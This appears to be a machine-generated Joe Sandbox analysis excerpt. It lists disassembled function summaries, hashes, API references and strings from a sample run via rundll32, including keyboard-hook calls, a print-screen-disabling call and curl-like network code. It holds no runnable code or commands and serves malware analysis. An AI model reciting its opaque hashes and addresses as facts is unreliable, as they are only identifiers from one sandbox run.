                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                    • String ID: bad allocation
                    • API String ID: 615853336-2104205924
                    • Opcode ID: 73dc123f90d8823c072d3f935a1f3b381c36003a6705dd4b40d6a204b64196fc
                    • Instruction ID: fbc9ebf6652b4827aa7aa02cab643db9496a66cd78934533ee6694434e8e6b66
                    • Opcode Fuzzy Hash: 73dc123f90d8823c072d3f935a1f3b381c36003a6705dd4b40d6a204b64196fc
                    • Instruction Fuzzy Hash: 23F0F935500109ABEB15EBA4D90A9EF7BA4EF4071CF102459EAC9A6480DBB1BE06C7D1
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 04EE1FE7
                      • Part of subcall function 04EE1F42: ___BuildCatchObjectHelper.LIBCMT ref: 04EE1F78
                    • _UnwindNestedFrames.LIBCMT ref: 04EE1FFE
                    • ___FrameUnwindToState.LIBCMT ref: 04EE200C
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm$csm
                    • API String ID: 2163707966-3733052814
                    • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                    • Instruction ID: 61fccba65a892d4c5528f1c92d5926e57caec4552de65b7ba8e5cb4297bc9a82
                    • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                    • Instruction Fuzzy Hash: 0001F67140010ABBEF12AF52CC44EFABF6AEF08398F005014BD5815260DB76E9B1DBE1
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 04EC2BDF
                      • Part of subcall function 04EC2B3A: ___BuildCatchObjectHelper.LIBCMT ref: 04EC2B70
                    • _UnwindNestedFrames.LIBCMT ref: 04EC2BF6
                    • ___FrameUnwindToState.LIBCMT ref: 04EC2C04
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm$csm
                    • API String ID: 2163707966-3733052814
                    • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                    • Instruction ID: 4f154f097e3b4ac0f6f2db0752f5cb1dd4f97f5add976d65f11fddf64965deac
                    • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                    • Instruction Fuzzy Hash: 5501FB7580110ABBDF125F51CE44EEB7F6AFF14358F009058BE1815160DB36E972EBA5
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 6D064093
                    • __alloca_probe_16.LIBCMT ref: 6D06415C
                    • __freea.LIBCMT ref: 6D0641C3
                      • Part of subcall function 6D05F83C: HeapAlloc.KERNEL32(00000000,6D06717F,?,?,6D06717F,00000220,?,?,?), ref: 6D05F86E
                    • __freea.LIBCMT ref: 6D0641D6
                    • __freea.LIBCMT ref: 6D0641E3
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocHeap
                    • String ID:
                    • API String ID: 1096550386-0
                    • Opcode ID: d370fba04683a53934e0bfd38848d4a769b3a7caa6febc866f3da805db98e089
                    • Instruction ID: d630be3b9e3c55f2cb1a09954a877e842bf27974777b943d3af981960c1b7ea4
                    • Opcode Fuzzy Hash: d370fba04683a53934e0bfd38848d4a769b3a7caa6febc866f3da805db98e089
                    • Instruction Fuzzy Hash: B351AA76608296BAFB118E649C90FBB3AE9EF99354B124029FE14DB150EB30DD1186B0
                    APIs
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(6D086840,00000010,6D04CC0C,?,?,?,?,6D086860,00000008,6D04CC90,?,?,?,00000000), ref: 6D04CAF9
                    • ___AdjustPointer.LIBCMT ref: 6D04CB61
                    • ___AdjustPointer.LIBCMT ref: 6D04CB84
                    • ___AdjustPointer.LIBCMT ref: 6D04CC20
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AdjustPointer$DisablePrintScreen@@
                    • String ID:
                    • API String ID: 737270400-0
                    • Opcode ID: 3461555e6cd5c17eee4e570302f56f7c45a6b30c9b367c9812641add46113543
                    • Instruction ID: 47bd28f15f8e4c19ef704432790c7232becca150f6451645405e74019ff8535e
                    • Opcode Fuzzy Hash: 3461555e6cd5c17eee4e570302f56f7c45a6b30c9b367c9812641add46113543
                    • Instruction Fuzzy Hash: 1151BD72608606EFFB1A8F14D950FBA73A4EF41314F10C53DE91657290EB32E868C798
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                    • String ID:
                    • API String ID: 4048096073-0
                    • Opcode ID: 85830fdd0532c69352a8dafae8a1de59cb1b951ebad45c523fb0a824246297a3
                    • Instruction ID: f6616ee3965e714eb7d3ff077d13b029f160d2891c0fbecd3a31a6c278b31323
                    • Opcode Fuzzy Hash: 85830fdd0532c69352a8dafae8a1de59cb1b951ebad45c523fb0a824246297a3
                    • Instruction Fuzzy Hash: 4551E531A00605EBDB258F698C886DFB7B1AF40328F1496A9E9A5A61D0D370BA50DFD0
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                    • String ID:
                    • API String ID: 4048096073-0
                    • Opcode ID: 1139bd14f2385309b5177e518c66b7e8130fb7077004a34db1f1c8364b1a048a
                    • Instruction ID: 6e31363da7e3806ae1e51b48ca5f16d6eaf5240aacb80e221d4dc49435bf7751
                    • Opcode Fuzzy Hash: 1139bd14f2385309b5177e518c66b7e8130fb7077004a34db1f1c8364b1a048a
                    • Instruction Fuzzy Hash: DE51E430E00205EFDF248F79C8446AEB7B1AF40328F14A6E9EE25961D0E771BA53DB51
                    APIs
                    • GetFileType.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,6D05B2B1,00000000,?), ref: 6D05B04E
                    • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D05B2B1,00000000), ref: 6D05B0A8
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6D05B2B1,00000000,?,?,00000000,?,?), ref: 6D05B136
                    • __dosmaperr.LIBCMT ref: 6D05B13D
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6D05B2B1), ref: 6D05B17A
                      • Part of subcall function 6D05B42A: __dosmaperr.LIBCMT ref: 6D05B45F
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: e457b86ccc9b346e395b5da6ae0cbd9ec2fe9b593f5d682d975d9e14e2fce8d2
                    • Instruction ID: e2306b63fbb66706feab89d5f0edf43c242569fd1b035b0ba4b9b0e65d3bc279
                    • Opcode Fuzzy Hash: e457b86ccc9b346e395b5da6ae0cbd9ec2fe9b593f5d682d975d9e14e2fce8d2
                    • Instruction Fuzzy Hash: D4415A75904204AFEB64DFB5D944BAFBBF9FF89300B408929F956D3610E730A850CB64
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2d24d9c685bf5b4dbd580062a2e91314c97e85e2f5f625a6a40c1adc58649775
                    • Instruction ID: e95f4d5b39bc3c8c27bdfbed3b16239f40e5d485f4df634927c17efa741524db
                    • Opcode Fuzzy Hash: 2d24d9c685bf5b4dbd580062a2e91314c97e85e2f5f625a6a40c1adc58649775
                    • Instruction Fuzzy Hash: 9831A0B1700210AFEB20DF68DD81B6A77A9EF88759F045569FA08C7241E6B5F8028B94
                    APIs
                    • _malloc.LIBCMT ref: 04EB35AB
                      • Part of subcall function 04EB375E: __FF_MSGBANNER.LIBCMT ref: 04EB3777
                      • Part of subcall function 04EB375E: __NMSG_WRITE.LIBCMT ref: 04EB377E
                      • Part of subcall function 04EB375E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3), ref: 04EB37A3
                    • _free.LIBCMT ref: 04EB35BE
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: 2c385113fa97b2a1a296580e8f0979442f60fd02d5576f79f99ba72dbf5bc20b
                    • Instruction ID: 7bcd084ee2f65d69105c5ef7a55f4cacd50cb00799475ceb0e3ccebec71c9f6d
                    • Opcode Fuzzy Hash: 2c385113fa97b2a1a296580e8f0979442f60fd02d5576f79f99ba72dbf5bc20b
                    • Instruction Fuzzy Hash: 6411E732905611FBDF226F75A8056EB3695AF4026DB126535ECC89B291EF34B8408BD4
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00000000,04EC57AA,?,?,?,1CA2304D), ref: 04EC525F
                    • _free.LIBCMT ref: 04EC526C
                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,04EC57AA,?,?,?,1CA2304D), ref: 04EC5283
                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,04EC57AA,?,?,?,1CA2304D), ref: 04EC528C
                    • HeapFree.KERNEL32(00000000,?,?,?,1CA2304D), ref: 04EC5293
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Free$Heap$LibraryProcessVirtual_free
                    • String ID:
                    • API String ID: 3953351234-0
                    • Opcode ID: 8fe3c341df2abe99d99453acdd8a36772e8e924bbb5ae47897c4597ed1d5127b
                    • Instruction ID: 17ee9df26c2bbf89d9e41af52eb87a3cf15d0b55cff2a4a136fa4fae46702acd
                    • Opcode Fuzzy Hash: 8fe3c341df2abe99d99453acdd8a36772e8e924bbb5ae47897c4597ed1d5127b
                    • Instruction Fuzzy Hash: 11016DB1600B10ABC734CF6AC984E57B3F9FBC5712B149A2DE5AA87284D734F842CB50
                    APIs
                    • __getptd.LIBCMT ref: 04EB8679
                      • Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
                      • Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848
                    • __getptd.LIBCMT ref: 04EB8690
                    • __amsg_exit.LIBCMT ref: 04EB869E
                    • __lock.LIBCMT ref: 04EB86AE
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 04EB86C2
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 31eb67969934a021dbdd5c84c87488c9c0c77d28489ad4fce8eeef9ce5042a65
                    • Instruction ID: 2d4eb84f522d79634dde29d8faa5f1031013c39ee95a1773efdc40a3ce013fff
                    • Opcode Fuzzy Hash: 31eb67969934a021dbdd5c84c87488c9c0c77d28489ad4fce8eeef9ce5042a65
                    • Instruction Fuzzy Hash: C1F06D32944704DBEB21BB6898057DF26A4BF0072DF516D59E8D0AA2D4CB7478418BDA
                    APIs
                    • __getptd.LIBCMT ref: 04ED9B2F
                      • Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
                      • Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0
                    • __getptd.LIBCMT ref: 04ED9B46
                    • __amsg_exit.LIBCMT ref: 04ED9B54
                    • __lock.LIBCMT ref: 04ED9B64
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 04ED9B78
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 6a9798e87dc26082d62b6078ee7b49e91b9a0c114d879d978f5a671bf476529c
                    • Instruction ID: d8b4b8b489c296a981924e357de215d41eef86cf8b0584126141c01989e29d68
                    • Opcode Fuzzy Hash: 6a9798e87dc26082d62b6078ee7b49e91b9a0c114d879d978f5a671bf476529c
                    • Instruction Fuzzy Hash: 74F090729047209AF721BB688C05B5D73D0AF0072CF167109D441AB1D2CB34B943DA5A
                    APIs
                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 6D01036B
                    • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 6D010387
                    Strings
                    • Failed to alloc scratch buffer, xrefs: 6D010226
                    • We are completely uploaded and fine, xrefs: 6D010477
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Ioctlsetsockopt
                    • String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
                    • API String ID: 1903391676-2419666956
                    • Opcode ID: 751411822659a96b36297e5f4529e387c09c6d1e35752938d05b3d46d93213ab
                    • Instruction ID: e87b083277dcabc5e0798db3f720570fe4a19fd3e33565c1ddef7bf68e95266a
                    • Opcode Fuzzy Hash: 751411822659a96b36297e5f4529e387c09c6d1e35752938d05b3d46d93213ab
                    • Instruction Fuzzy Hash: 08E18E7160CB429FE321CF79C880BABB7E5BF89304F44092DE5EA87242E731A555CB52
                    APIs
                      • Part of subcall function 6CFFEEC0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
                      • Part of subcall function 6CFFEEC0: __alldvrm.LIBCMT ref: 6CFFEEED
                      • Part of subcall function 6CFFEEC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14
                    • WSASetLastError.WS2_32(?,?), ref: 6D00BA41
                    Strings
                    • Connection timeout after %ld ms, xrefs: 6D00BBE3
                    • Failed to connect to %s port %u after %I64d ms: %s, xrefs: 6D00BB8B
                    • %s connect timeout after %I64dms, move on!, xrefs: 6D00B8BC
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CounterErrorLastPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                    • String ID: %s connect timeout after %I64dms, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s
                    • API String ID: 4159349166-2476235426
                    • Opcode ID: 688f377af69d92c6d3a3070848cb93087da5d01c975efe2417ce22d991fc83ab
                    • Instruction ID: b1d5deae20c3a75186e38e9c7d396004be4770217d6f94f93834e3bb2402dbf0
                    • Opcode Fuzzy Hash: 688f377af69d92c6d3a3070848cb93087da5d01c975efe2417ce22d991fc83ab
                    • Instruction Fuzzy Hash: 04D19D70A08745AFF721DF28C440B6BBBE0FF85308F45495DE99997212E7B1E984CB92
                    APIs
                    • ?UnInstallKBHook@@YAHXZ.HKEYBOARD(?,?,operation aborted by pre-request callback), ref: 6CFFB24F
                    • ?UnInstallKBHook@@YAHXZ.HKEYBOARD ref: 6CFFB3C9
                    • ?UnInstallKBHook@@YAHXZ.HKEYBOARD ref: 6CFFB450
                    Strings
                    • operation aborted by pre-request callback, xrefs: 6CFFB23A
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Hook@@Install
                    • String ID: operation aborted by pre-request callback
                    • API String ID: 3523473461-1824986975
                    • Opcode ID: 37dc414b4effa8123842ee616328221457dbec7071146ed167499b031478ac7a
                    • Instruction ID: 9f47d74f30dcef736ec06494dc7dd27e1f7c29b113b5396df67ddf1757203d4a
                    • Opcode Fuzzy Hash: 37dc414b4effa8123842ee616328221457dbec7071146ed167499b031478ac7a
                    • Instruction Fuzzy Hash: B6C103315097409FE321CF25C884B9B77E4EF42318F240E1DE5B997AA1DB71E14ACB92
                    APIs
                      • Part of subcall function 6D0432A0: WSAGetLastError.WS2_32 ref: 6D043361
                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Ctrl conn has data while waiting for data conn), ref: 6D025FF1
                    Strings
                    • We got a 421 - timeout, xrefs: 6D026013
                    • FTP response timeout, xrefs: 6D02603E
                    • FTP response aborted due to select/poll error: %d, xrefs: 6D025FF8
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout
                    • API String ID: 1452528299-3016466939
                    • Opcode ID: 1ee5c03dd7f98e878a99b5eb44a2cf003aade32a93c9bdcfd74cd7ba62cf888f
                    • Instruction ID: 16cfe2ad8f70591dff38cfe3eb76c1ac3756fb73259bcd0f180547ecb59072c7
                    • Opcode Fuzzy Hash: 1ee5c03dd7f98e878a99b5eb44a2cf003aade32a93c9bdcfd74cd7ba62cf888f
                    • Instruction Fuzzy Hash: 3B4102796093019BF3008A19D884BBB73E4FFC9328F54417AF94887255E735D90987AA
                    APIs
                    • recvfrom.WS2_32(?,?,?,00000000,?), ref: 6D02F92F
                    Strings
                    • TFTP error: %s, xrefs: 6D02FA6A
                    • Received too short packet, xrefs: 6D02F971
                    • Internal error: Unexpected packet, xrefs: 6D02FA91
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: recvfrom
                    • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
                    • API String ID: 846543921-343195773
                    • Opcode ID: 25c8b141b8bec3d5c61db5532a9dbfe7fc372610267ece70d5cf3b1a6fdcb539
                    • Instruction ID: aa89ddfe5855779cebf706ed3361e0e3755e02b1c345411fe2089e770dafb4a2
                    • Opcode Fuzzy Hash: 25c8b141b8bec3d5c61db5532a9dbfe7fc372610267ece70d5cf3b1a6fdcb539
                    • Instruction Fuzzy Hash: 7A51F0B1908202ABF314CB25CC80FBAFBECBB45349F05462AF95DD6142E775E518CBA1
                    APIs
                    • getpeername.WS2_32(?,?,?), ref: 6D035DF4
                    • WSAGetLastError.WS2_32 ref: 6D035DFE
                      • Part of subcall function 6D00AF50: htons.WS2_32(?), ref: 6D00AF8C
                      • Part of subcall function 6D01A850: GetLastError.KERNEL32(?,00000000,?,6D008B2F,00000000,?,00000100,?,?,?,?,?,?,?), ref: 6D01A853
                    Strings
                    • ssrem inet_ntop() failed with errno %d: %s, xrefs: 6D035E6D
                    • getpeername() failed with errno %d: %s, xrefs: 6D035E1B
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$getpeernamehtons
                    • String ID: getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                    • API String ID: 4212301432-4047410615
                    • Opcode ID: 41af5b0bb759e1e80113c4f0666ceb4d5035b79c6ec333eda30241446925cc79
                    • Instruction ID: 2fc56db78a1acc5dcd28f573b1791ae3476201fb7c342a06ce331428bedf1df5
                    • Opcode Fuzzy Hash: 41af5b0bb759e1e80113c4f0666ceb4d5035b79c6ec333eda30241446925cc79
